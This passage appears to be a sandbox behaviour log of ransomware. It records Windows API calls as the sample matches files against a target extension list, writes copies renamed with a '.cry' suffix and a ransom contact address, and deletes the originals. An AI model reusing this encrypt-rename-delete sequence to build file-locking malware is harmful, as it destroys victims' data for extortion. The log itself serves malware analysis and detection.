(in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.990] WriteFile (in: hFile=0x1f4, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x2d9fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0048.022] SetEndOfFile (hFile=0x1f4) returned 1 [0048.022] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x43b0048 [0048.023] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.023] WriteFile (in: hFile=0x1f4, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.023] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.023] WriteFile (in: hFile=0x1f4, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.024] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.024] WriteFile (in: hFile=0x1f4, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.144] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x43b0048 | out: hHeap=0x600000) returned 1 [0048.146] CloseHandle (hObject=0x1f4) returned 1 [0048.147] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0048.147] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.147] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.147] lstrlenW (lpString=".doc") returned 4 [0048.147] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.147] lstrlenW (lpString=".docx") returned 5 [0048.147] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.147] lstrlenW (lpString=".pdf") returned 4 [0048.147] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.147] lstrlenW (lpString=".xls") returned 4 [0048.147] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.147] lstrlenW (lpString=".xlsx") returned 5 [0048.147] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.147] lstrlenW (lpString=".ppt") returned 4 [0048.147] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.147] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.147] lstrlenW (lpString=".zip") returned 4 [0048.147] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.147] lstrlenW (lpString=".rar") returned 4 [0048.147] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.147] lstrlenW (lpString=".bz2") returned 4 [0048.147] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.147] lstrlenW (lpString=".7z") returned 3 [0048.147] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.147] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.147] lstrlenW (lpString=".dbf") returned 4 [0048.147] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.147] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.147] lstrlenW (lpString=".1cd") returned 4 [0048.148] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.148] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.148] lstrlenW (lpString=".jpg") returned 4 [0048.148] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.148] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.148] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.148] lstrlenW (lpString=".doc") returned 4 [0048.148] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.148] lstrlenW (lpString=".docx") returned 5 [0048.148] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.148] lstrlenW (lpString=".pdf") returned 4 [0048.148] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.148] lstrlenW (lpString=".xls") returned 4 [0048.148] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.148] lstrlenW (lpString=".xlsx") returned 5 [0048.148] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.148] lstrlenW (lpString=".ppt") returned 4 [0048.148] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.148] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.148] lstrlenW (lpString=".zip") returned 4 [0048.148] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.148] lstrlenW (lpString=".rar") returned 4 [0048.148] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.148] lstrlenW (lpString=".bz2") returned 4 [0048.148] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.148] lstrlenW (lpString=".7z") returned 3 [0048.148] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.148] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.148] lstrlenW (lpString=".dbf") returned 4 [0048.148] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.148] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.148] lstrlenW (lpString=".1cd") returned 4 [0048.148] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.148] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.148] lstrlenW (lpString=".jpg") returned 4 [0048.148] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.149] lstrcmpiW (lpString1=".exe", lpString2=".cry") returned 1 [0048.149] lstrlenW (lpString="setup.exe") returned 9 [0048.149] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0048.149] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1377656) returned 1 [0048.149] CloseHandle (hObject=0x1f4) returned 1 [0048.149] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0048.149] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.149] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0048.149] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.149] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.149] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0048.494] GetLastError () returned 0x0 [0048.495] ReadFile (in: hFile=0x1f4, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0048.709] WriteFile (in: hFile=0x228, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0048.812] ReadFile (in: hFile=0x1f4, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x50588, lpOverlapped=0x0) returned 1 [0048.875] WriteFile (in: hFile=0x228, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x50590, lpOverlapped=0x0) returned 1 [0048.892] ReadFile (in: hFile=0x1f4, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.892] WriteFile (in: hFile=0x228, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0048.892] SetEndOfFile (hFile=0x228) returned 1 [0048.893] CloseHandle (hObject=0x228) returned 1 [0048.894] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.894] SetEndOfFile (hFile=0x1f4) returned 1 [0048.897] CloseHandle (hObject=0x1f4) returned 1 [0048.897] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0048.897] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0048.897] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.897] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.897] lstrlenW (lpString=".doc") returned 4 [0048.897] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0048.898] lstrlenW (lpString=".docx") returned 5 [0048.898] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0048.898] lstrlenW (lpString=".pdf") returned 4 [0048.898] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0048.898] lstrlenW (lpString=".xls") returned 4 [0048.898] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0048.898] lstrlenW (lpString=".xlsx") returned 5 [0048.898] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0048.898] lstrlenW (lpString=".ppt") returned 4 [0048.898] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0048.898] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.898] lstrlenW (lpString=".zip") returned 4 [0048.898] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0048.898] lstrlenW (lpString=".rar") returned 4 [0048.898] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0048.898] lstrlenW (lpString=".bz2") returned 4 [0048.898] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0048.898] lstrlenW (lpString=".7z") returned 3 [0048.898] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0048.898] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.898] lstrlenW (lpString=".dbf") returned 4 [0048.898] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0048.898] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.898] lstrlenW (lpString=".1cd") returned 4 [0048.898] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0048.898] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.898] lstrlenW (lpString=".jpg") returned 4 [0048.898] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0048.898] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.898] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.899] lstrlenW (lpString=".doc") returned 4 [0048.899] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0048.899] lstrlenW (lpString=".docx") returned 5 [0048.899] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0048.899] lstrlenW (lpString=".pdf") returned 4 [0048.899] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0048.899] lstrlenW (lpString=".xls") returned 4 [0048.899] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0048.899] lstrlenW (lpString=".xlsx") returned 5 [0048.899] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0048.899] lstrlenW (lpString=".ppt") returned 4 [0048.899] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0048.899] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.899] lstrlenW (lpString=".zip") returned 4 [0048.899] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0048.899] lstrlenW (lpString=".rar") returned 4 [0048.899] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0048.899] lstrlenW (lpString=".bz2") returned 4 [0048.899] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0048.899] lstrlenW (lpString=".7z") returned 3 [0048.899] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0048.899] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.899] lstrlenW (lpString=".dbf") returned 4 [0048.899] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0048.899] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.899] lstrlenW (lpString=".1cd") returned 4 [0048.899] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0048.899] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.899] lstrlenW (lpString=".jpg") returned 4 [0048.899] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0048.899] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0048.900] lstrlenW (lpString="PidGenX.dll") returned 11 [0048.900] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0049.651] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1463568) returned 1 [0049.651] CloseHandle (hObject=0x1c4) returned 1 [0049.651] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0049.651] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.651] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0049.651] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.651] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.651] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0049.652] GetLastError () returned 0x0 [0049.652] ReadFile (in: hFile=0x1c4, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0049.690] WriteFile (in: hFile=0x22c, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0049.708] ReadFile (in: hFile=0x1c4, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x65520, lpOverlapped=0x0) returned 1 [0049.757] WriteFile (in: hFile=0x22c, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x65530, lpOverlapped=0x0) returned 1 [0049.886] ReadFile (in: hFile=0x1c4, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.886] WriteFile (in: hFile=0x22c, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.889] SetEndOfFile (hFile=0x22c) returned 1 [0049.889] CloseHandle (hObject=0x22c) returned 1 [0049.890] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.890] SetEndOfFile (hFile=0x1c4) returned 1 [0049.907] CloseHandle (hObject=0x1c4) returned 1 [0049.907] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0049.908] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0049.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.908] lstrlenW (lpString=".doc") returned 4 [0049.908] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0049.908] lstrlenW (lpString=".docx") returned 5 [0049.908] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0049.908] lstrlenW (lpString=".pdf") returned 4 [0049.908] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.908] lstrlenW (lpString=".xls") returned 4 [0049.908] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0049.908] lstrlenW (lpString=".xlsx") returned 5 [0049.908] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0049.908] lstrlenW (lpString=".ppt") returned 4 [0049.908] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0049.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.908] lstrlenW (lpString=".zip") returned 4 [0049.908] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0049.909] lstrlenW (lpString=".rar") returned 4 [0049.909] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0049.909] lstrlenW (lpString=".bz2") returned 4 [0049.909] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0049.909] lstrlenW (lpString=".7z") returned 3 [0049.909] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0049.909] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.909] lstrlenW (lpString=".dbf") returned 4 [0049.909] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0049.909] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.909] lstrlenW (lpString=".1cd") returned 4 [0049.909] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0049.909] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.909] lstrlenW (lpString=".jpg") returned 4 [0049.909] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0049.909] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.909] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.909] lstrlenW (lpString=".doc") returned 4 [0049.909] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0049.909] lstrlenW (lpString=".docx") returned 5 [0049.909] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0049.909] lstrlenW (lpString=".pdf") returned 4 [0049.909] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.909] lstrlenW (lpString=".xls") returned 4 [0049.909] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0049.909] lstrlenW (lpString=".xlsx") returned 5 [0049.909] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0049.910] lstrlenW (lpString=".ppt") returned 4 [0049.910] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0049.910] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.910] lstrlenW (lpString=".zip") returned 4 [0049.910] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0049.910] lstrlenW (lpString=".rar") returned 4 [0049.910] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0049.910] lstrlenW (lpString=".bz2") returned 4 [0049.910] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0049.910] lstrlenW (lpString=".7z") returned 3 [0049.910] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0049.910] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.910] lstrlenW (lpString=".dbf") returned 4 [0049.910] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0049.910] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.910] lstrlenW (lpString=".1cd") returned 4 [0049.910] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0049.910] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.910] lstrlenW (lpString=".jpg") returned 4 [0049.910] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0049.910] lstrcmpiW (lpString1=".exe", lpString2=".cry") returned 1 [0049.910] lstrlenW (lpString="ose.exe") returned 7 [0049.910] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0050.334] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=174440) returned 1 [0050.334] CloseHandle (hObject=0x190) returned 1 [0050.334] GetFileAttributesW 